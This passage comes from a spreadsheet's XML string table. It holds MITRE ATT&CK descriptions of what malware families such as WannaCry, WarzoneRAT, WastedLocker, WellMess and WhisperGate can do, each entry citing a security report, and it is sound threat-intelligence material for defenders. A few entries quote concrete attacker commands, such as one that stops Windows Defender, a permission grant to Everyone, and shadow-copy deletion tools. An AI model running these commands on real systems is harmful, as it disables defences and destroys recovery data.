    <t>[Volgmer](https://attack.mitre.org/software/S0180) can gather the IP address from the victim's machine.(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can gather information about TCP connection state.(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) queries the system to identify existing services.(Citation: US-CERT Volgmer Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can execute commands on the victim's machine.(Citation: US-CERT Volgmer Nov 2017)(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) installs a copy of itself in a randomly selected service, then overwrites the ServiceDLL entry in the service's Registry entry. Some [Volgmer](https://attack.mitre.org/software/S0180) variants also install .dll files as services with names generated by a list of hard-coded strings.(Citation: US-CERT Volgmer Nov 2017)(Citation: US-CERT Volgmer 2 Nov 2017)(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>Variants of [WEBC2](https://attack.mitre.org/software/S0109) achieve persistence by using DLL search order hijacking, usually by copying the DLL file to &lt;code&gt;%SYSTEMROOT%&lt;/code&gt; (&lt;code&gt;C:\WINDOWS\ntshrui.dll&lt;/code&gt;).(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[WEBC2](https://attack.mitre.org/software/S0109) can download and execute a file.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[WEBC2](https://attack.mitre.org/software/S0109) can open an interactive command shell.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[WINDSHIELD](https://attack.mitre.org/software/S0155) is capable of file deletion along with other file system interaction.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[WINDSHIELD](https://attack.mitre.org/software/S0155) C2 traffic can communicate via TCP raw sockets.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[WINDSHIELD](https://attack.mitre.org/software/S0155) can gather Registry values.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[WINDSHIELD](https://attack.mitre.org/software/S0155) can gather the victim computer name.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[WINDSHIELD](https://attack.mitre.org/software/S0155) can gather the victim user name.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can enumerate active windows.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can create a reverse shell that utilizes statically-linked Wine cmd.exe code to emulate Windows command prompt commands.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can enumerate files and directories.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can enumerate processes.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can gather information about the host.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can gather information on the victim username.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can enumerate services.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) uses [Tor](https://attack.mitre.org/software/S0183) for command and control traffic and routes a custom cryptographic protocol over the [Tor](https://attack.mitre.org/software/S0183) circuit.(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) encrypts user files and demands that a ransom be paid in Bitcoin to decrypt those files.(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) uses an exploit in SMBv1 to spread itself to other remote systems on a network.(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)(Citation: US-CERT WannaCry 2017)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) searches for variety of user files by file extension before encrypting them using RSA and AES, including Office, PDF, image, audio, video, source code, archive/compression format, and key and certificate files.(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) uses &lt;code&gt;attrib +h&lt;/code&gt; to make some of its files hidden.(Citation: LogRhythm WannaCry)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) uses &lt;code&gt;vssadmin&lt;/code&gt;, &lt;code&gt;wbadmin&lt;/code&gt;, &lt;code&gt;bcdedit&lt;/code&gt;, and &lt;code&gt;wmic&lt;/code&gt; to delete and disable operating system recovery features.(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) attempts to copy itself to remote computers after gaining access via an SMB exploit.(Citation: LogRhythm WannaCry)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) uses [Tor](https://attack.mitre.org/software/S0183) for command and control traffic.(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) contains a thread that will attempt to scan for new attached drives every few seconds. If one is identified, it will encrypt the files on the attached device.(Citation: FireEye WannaCry 2017)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) enumerates current remote desktop sessions and tries to execute the malware on each session.(Citation: LogRhythm WannaCry)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) scans its local network segment for remote systems to try to exploit and copy itself to.(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) attempts to kill processes associated with Exchange, Microsoft SQL Server, and MySQL to make it possible to encrypt their data stores.(Citation: FireEye WannaCry 2017)(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) will attempt to determine the local network segment it is a part of.(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) uses &lt;code&gt;attrib +h&lt;/code&gt; and &lt;code&gt;icacls . /grant Everyone:F /T /C /Q&lt;/code&gt; to make some of its files hidden and grant all users full access controls.(Citation: LogRhythm WannaCry)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) utilizes &lt;code&gt;wmic&lt;/code&gt; to delete shadow copies.(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) creates the service "mssecsvc2.0" with the display name "Microsoft Security Center (2.0) Service."(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can use `sdclt.exe` to bypass UAC in Windows 10 to escalate privileges; for older Windows versions [WarzoneRAT](https://attack.mitre.org/software/S0670) can use the IFileOperation exploit to bypass the UAC module.(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Warzone UAC Bypass November 2020)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670)  can perform COM hijacking by setting the path to itself to the `HKCU\Software\Classes\Folder\shell\open\command` key with a `DelegateExecute` parameter.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) has the capability to grab passwords from numerous web browsers as well as from Outlook and Thunderbird email clients.(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Warzone UAC Bypass November 2020)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can collect data from a compromised host.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can use XOR 0x45 to decrypt obfuscated code.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can disarm Windows Defender during the UAC process to evade detection.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can send collected victim data to its C2 server.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can enumerate directories on a compromise host.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can masquerade the Process Environment Block on a compromised host to hide it's attempts to elevate privileges through `IFileOperation`.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can download and execute additional files.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[WarzoneRAT](https://attack.mitre.org/software/S0670) has the capability to install a live and offline keylogger, including through the use of the `GetAsyncKeyState` Windows API.(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Warzone UAC Bypass November 2020) </t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) has relied on a victim to open a malicious attachment within an email for execution.(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Confucius APT Jan 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[WarzoneRAT](https://attack.mitre.org/software/S0670) can create `HKCU\Software\Classes\Folder\shell\open\command` as a new registry key during privilege escalation.(Citation: Uptycs Warzone UAC Bypass November 2020)(Citation: Check Point Warzone Feb 2020) </t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can use a variety of API calls on a compromised host.(Citation: Uptycs Warzone UAC Bypass November 2020)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can communicate with its C2 server via TCP over port 5200.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can use PowerShell to download files and execute commands.(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Warzone UAC Bypass November 2020)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can obtain a list of processes on a compromised host.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) has the ability to inject malicious DLLs into a specific process for privilege escalation.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) has the capability to act as a reverse proxy.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can add itself to the `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` and `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UIF2IS20VK` Registry keys.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) has the ability to control an infected PC using RDP.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can include a rootkit to hide processes, files, and startup.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) has been distributed as a malicious attachment within an email.(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Confucius APT Jan 2021)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can encrypt its C2 with RC4 with the password `warzone160\x00`.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can collect compromised host information, including OS version, PC name, RAM size, and CPU details.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) has been install via template injection through a malicious DLL embedded within a template RTF in a Word document.(Citation: Uptycs Confucius APT Jan 2021)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) has the ability of performing remote desktop access via a VNC console.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can access the webcam on a victim's machine.(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Warzone UAC Bypass November 2020)</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can use `cmd.exe` to execute malicious code.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612) contains junk code to increase its entropy and hide the actual code.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612) can perform a UAC bypass if it is not executed with administrator rights or if the infected host runs Windows Vista or later.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve"> [WastedLocker](https://attack.mitre.org/software/S0612) has performed DLL hijacking before execution.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[WastedLocker](https://attack.mitre.org/software/S0612) can encrypt data and leave a ransom note.(Citation: Symantec WastedLocker June 2020)(Citation: NCC Group WastedLocker June 2020)(Citation: Sentinel Labs WastedLocker July 2020) </t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612)'s custom cryptor, CryptOne, used an XOR based algorithm to decrypt the payload.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612) can enumerate files and directories just prior to encryption.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612) has copied a random file from the Windows System32 folder to the &lt;code&gt;%APPDATA%&lt;/code&gt; location under a different hidden filename.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[WastedLocker](https://attack.mitre.org/software/S0612) can delete shadow volumes.(Citation: Symantec WastedLocker June 2020)(Citation: NCC Group WastedLocker June 2020)(Citation: Sentinel Labs WastedLocker July 2020) </t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612) can modify registry values within the &lt;code&gt;Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap&lt;/code&gt; registry key.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612) has the ability to save and execute files as an alternate data stream (ADS).(Citation: Sentinel Labs WastedLocker July 2020)</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612)'s custom crypter, CryptOne, leveraged the VirtualAlloc() API function to help execute the payload.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612) can identify network adjacent and accessible drives.(Citation: Sentinel Labs WastedLocker July 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">The [WastedLocker](https://attack.mitre.org/software/S0612) payload includes encrypted strings stored within the .bss section of the binary file.(Citation: NCC Group WastedLocker June 2020)   </t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612) can enumerate removable drives prior to the encryption process.(Citation: Sentinel Labs WastedLocker July 2020)</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612) checks for specific registry keys related to the &lt;code&gt;UCOMIEnumConnections&lt;/code&gt; and &lt;code&gt;IActiveScriptParseProcedure32&lt;/code&gt; interfaces.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612) can execute itself as a service.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612) checked if UCOMIEnumConnections and IActiveScriptParseProcedure32 Registry keys were detected as part of its anti-analysis technique.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t>[WastedLocker](https://attack.mitre.org/software/S0612) has used [cmd](https://attack.mitre.org/software/S0106) to execute commands on the system.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[WastedLocker](https://attack.mitre.org/software/S0612) has a command to take ownership of a file and reset the ACL permissions using the &lt;code&gt;takeown.exe /F filepath&lt;/code&gt; command.(Citation: NCC Group WastedLocker June 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[WastedLocker](https://attack.mitre.org/software/S0612) created and established a service that runs until the encryption process is complete.(Citation: NCC Group WastedLocker June 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Waterbear](https://attack.mitre.org/software/S0579) has used DLL side loading to import and load a malicious DLL loader.(Citation: Trend Micro Waterbear December 2019) </t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) has the ability to decrypt its RC4 encrypted payload for execution.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can hook the &lt;code&gt;ZwOpenProcess&lt;/code&gt; and &lt;code&gt;GetExtendedTcpTable&lt;/code&gt; APIs called by the process of a security product to hide PIDs and TCP records from detection.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can scramble functions not to be executed again with random values.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can receive and load executables from remote C2 servers.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Waterbear](https://attack.mitre.org/software/S0579) has deleted certain values from the Registry to load a malicious DLL.(Citation: Trend Micro Waterbear December 2019) </t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can leverage API functions for execution.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) has used RC4 encrypted shellcode and encrypted functions.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can identify the process for a specific security product.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can inject decrypted shellcode into the LanmanServer service.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can query the Registry key &lt;code&gt;"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI"&lt;/code&gt; to see if the value `OracleOcilib` exists.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can find the presence of a specific security software.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Waterbear](https://attack.mitre.org/software/S0579) can use API hooks on `GetExtendedTcpTable` to retrieve a table containing a list of TCP endpoints available to the application.(Citation: Trend Micro Waterbear December 2019) </t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can use thread injection to inject shellcode into the process of security software.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can archive files on the compromised host.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can use hard coded client and certificate authority certificates to communicate with C2 over mutual TLS.(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can exfiltrate files from the victim machine.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can decompress scripts received from C2.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can receive data and executable scripts from C2.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can use TCP for C2 communications.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) has been observed using TCP port 25, without using SMTP, to leverage an open port for secure command and control communications.(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can identify the IP address of the victim system.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can identify the current username on the victim system.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can communicate to C2 with mutual TLS where client and server mutually check certificates.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) has the ability to use DNS tunneling for C2 communications.(Citation: PWC WellMess July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can send files from the victim machine to C2.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can decode and decrypt data received from C2.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can identify domain group membership for the current user.(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can write files to a compromised host.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can use junk data in the Base64 string for additional obfuscation.(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can execute PowerShell scripts received from C2.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) has used Base64 encoding to uniquely identify communication to and from the C2.(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can encrypt HTTP POST data using RC6 and a dynamically generated AES key encrypted with a hard coded RSA public key.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can identify the computer name of a compromised host.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can identify the IP address and user domain on the target machine.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can collect the username on the victim machine to send to C2.(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can use HTTP and HTTPS in C2 communications.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can execute command line scripts received from C2.(Citation: PWC WellMess July 2020)</t>
  </si>
  <si>
    <t>[Wevtutil](https://attack.mitre.org/software/S0645) can be used to clear system and security event logs from the system.(Citation: Wevtutil Microsoft Documentation)(Citation: Crowdstrike DNC June 2016)</t>
  </si>
  <si>
    <t>[Wevtutil](https://attack.mitre.org/software/S0645) can be used to export events from a specific log.(Citation: Wevtutil Microsoft Documentation)(Citation: F-Secure Lazarus Cryptocurrency Aug 2020)</t>
  </si>
  <si>
    <t>[Wevtutil](https://attack.mitre.org/software/S0645) can be used to disable specific event logs on the system.(Citation: Wevtutil Microsoft Documentation)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) overwrites the MBR with a bootloader component that performs destructive wiping operations on hard drives and displays a fake ransom note when the host boots.(Citation: Crowdstrike WhisperGate January 2022)(Citation: Cybereason WhisperGate February 2022)(Citation: Microsoft WhisperGate January 2022)(Citation: Cisco Ukraine Wipers January 2022)(Citation: Medium S2W WhisperGate January 2022)</t>
  </si>
  <si>
    <t>The [WhisperGate](https://attack.mitre.org/software/S0689) third stage can use the AdvancedRun.exe tool to execute commands in the context of the Windows TrustedInstaller group via `%TEMP%\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run`.(Citation: Cisco Ukraine Wipers January 2022)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can corrupt files by overwriting the first 1 MB with `0xcc` and appending random extensions.(Citation: Microsoft WhisperGate January 2022)(Citation: Crowdstrike WhisperGate January 2022)(Citation: Cybereason WhisperGate February 2022)(Citation: Unit 42 WhisperGate January 2022)(Citation: Cisco Ukraine Wipers January 2022)(Citation: Medium S2W WhisperGate January 2022)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can deobfuscate downloaded files stored in reverse byte order and decrypt embedded resources using multiple XOR operations.(Citation: Cisco Ukraine Wipers January 2022)(Citation: Medium S2W WhisperGate January 2022)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can download and execute AdvancedRun.exe to disable the Windows Defender Theat Protection service and set an exclusion path for the C:\ drive.(Citation: Unit 42 WhisperGate January 2022)(Citation: Cisco Ukraine Wipers January 2022)(Citation: Medium S2W WhisperGate January 2022)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can overwrite sectors of a victim host's hard drive at periodic offsets.(Citation: Crowdstrike WhisperGate January 2022)(Citation: Cisco Ukraine Wipers January 2022)(Citation: Medium S2W WhisperGate January 2022)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can overwrite the Master Book Record (MBR) on victim systems with a malicious 16-bit bootloader.(Citation: Microsoft WhisperGate January 2022)(Citation: Crowdstrike WhisperGate January 2022)(Citation: Cybereason WhisperGate February 2022)(Citation: Unit 42 WhisperGate January 2022)(Citation: Cisco Ukraine Wipers January 2022)(Citation: Medium S2W WhisperGate January 2022)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can delete tools from a compromised host after execution.(Citation: Cisco Ukraine Wipers January 2022)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can locate files based on hardcoded file extensions.(Citation: Microsoft WhisperGate January 2022)(Citation: Unit 42 WhisperGate January 2022)(Citation: Cisco Ukraine Wipers January 2022)(Citation: Medium S2W WhisperGate January 2022)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can download additional stages of malware from a Discord CDN channel.(Citation: Microsoft WhisperGate January 2022)(Citation: Unit 42 WhisperGate January 2022)(Citation: Cisco Ukraine Wipers January 2022)(Citation: Medium S2W WhisperGate January 2022)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) has used `InstallUtil.exe` as part of its process to disable Windows Defender.(Citation: Unit 42 WhisperGate January 2022)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) has been disguised as a JPG extension to avoid detection as a malicious PE file.(Citation: Medium S2W WhisperGate January 2022)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) has used the `ExitWindowsEx` API to flush file buffers to disk and stop running processes.(Citation: Cisco Ukraine Wipers January 2022)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can enumerate connected remote logical drives.(Citation: Cisco Ukraine Wipers January 2022)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can Base64 encode strings, store downloaded files in reverse byte order,  and use the Eazfuscator tool to obfuscate its third stage.(Citation: Cisco Ukraine Wipers January 2022)(Citation: Medium S2W WhisperGate January 2022)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can use PowerShell to support multiple actions including execution and defense evasion.(Citation: Unit 42 WhisperGate January 2022)(Citation: Cisco Ukraine Wipers January 2022)(Citation: Medium S2W WhisperGate January 2022)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) has the ability to inject its fourth stage into a suspended process created by the legitimate Windows utility `InstallUtil.exe`.(Citation: Cisco Ukraine Wipers January 2022)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can recognize the presence of monitoring tools on a target system.(Citation: Unit 42 WhisperGate January 2022)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can download and execute AdvancedRun.exe via `sc.exe`.(Citation: Medium S2W WhisperGate January 2022)(Citation: Unit 42 WhisperGate January 2022)</t>
  </si>
  <si>
